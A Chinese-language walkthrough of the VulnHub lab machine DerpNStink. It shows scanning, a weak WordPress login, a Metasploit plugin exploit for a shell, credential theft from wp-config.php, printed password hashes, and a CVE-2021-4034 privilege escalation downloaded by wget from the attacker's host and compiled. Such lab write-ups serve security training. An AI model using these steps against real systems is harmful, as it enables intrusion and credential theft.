靶机安装

下载地址：DerpNStink: 1 ~ VulnHub

信息收集

靶机IP扫描

nmap 192.168.93.0/24

端口扫描，开放21、22、80端口

nmap -A  192.168.93.158 -p-

目录扫描

dirsearch -u http://192.168.93.158

进行网址访问，页面上只有个单词DeRPnStiNK，先记下来

点击检查，发现第一个flag

又发现存在一个文件/webnotes/info.txt进行访问

翻译一下

是需要更新本地DNS主机文件，思考应该是需要我们把IP和对应的域名进行添加到hosts文件中，但不知道域名是什么

后面拼接扫描出来的目录/php/phpmyadmin/看起来应该是一个可以登录到数据库里面的

拼接/robots.txt

继续访问

我们重新用另一命令进行目录扫描一下,会出现许多上面没有扫出来的目录，

dirb  http://192.168.93.158

weblog目录下存在登录页面，测试一下

发现进行了域名跳转到：https://derpnstink.local/weblog/，并且页面加载失败

因此可能前面的DNS更新应该是192.168.93.158与derpnstink.local/weblog/的对应关系添加

通过目录扫描出来的，还有目录//weblog/wp-admin/

尝试弱口令登录，成功 admin/admin

漏洞利用

这个框架是WordPress，进行工具使用 wpscan 扫描，扫描到很多插件存在漏洞

wpscan --url http://derpnstink.local/weblog

使用Slideshow Gallery 存在的漏洞

因为我们知道后台的账户密码，所以我们用msf来进行getshell操作

开启msf环境

msfconsole

search slideshow				
use 1		
show option
set rhosts 192.168.93.158
set targeturi /weblog/	#设置目标的url目录地址
set wp_user admin
set wp_password admin
run

先将获取到的shell转变为交互式的shell

shell

python -c 'import pty; pty.spawn("/bin/bash")'		# 获得交互式命令行

翻看配置文件，发现了目标数据库的账号和密码

cd /var/www/html/weblog
ls
cat wp-config.php
 
root:mysql

是数据库的账号和密码，回到页面进行登录，登录成功

访问 wp_posts 表发现 flag2.txt

在 wp_users 表发现两个账户密码

unclestinky：$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin：$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

破解之后是wedgie57

在靶机home目录下发现两个用户，mrderp/stinky

尝试切换到stinky用户，密码使用刚刚破解得到的wedgie57

成功切换到stinky用户，进入到stinky目录并查看当前目录的所有文件

在Desktop目录发现了flag3

提权

观察到ubuntu版本是14.04，可能存在一个漏洞。

我刚开始用的是kali上面的searchsploit工具命令进行搜索版本利用搜索出来的脚本文件，但失败了，也可能是利用的脚本不对，大家可以多尝试几个脚本，看看能否成功，也希望与大家讨论

我在这找了一个有关版本的相关提权文件，有一个本地提权漏洞CVE-2021-4034， 作用有点类似于sudo，允许用户以另一个用户身份执行命令

#这个提权漏洞利用脚本下载地址
https://github.com/arthepsy/CVE-2021-4034

将这个文件下载下来，复制到kali里面，并挂到服务上面

在反弹的交互式shell中，必须要进入tmp目录，否则无法下载

从kali的web端wget下来cve-2021-4034-poc.c，将其gcc编译输出。然后复权运行，即可提权成功。

#下载命令
wget http://192.168.93.130:8000/cve-2021-4034-poc.c

#下载完成之后，权限修改
chmod +x cve-2021-4034-poc.c

#编译脚本
gcc -pthread cve-2021-4034-poc.c -o cve-2021-4034-poc -lcrypt

进行这个脚本运行，提权成功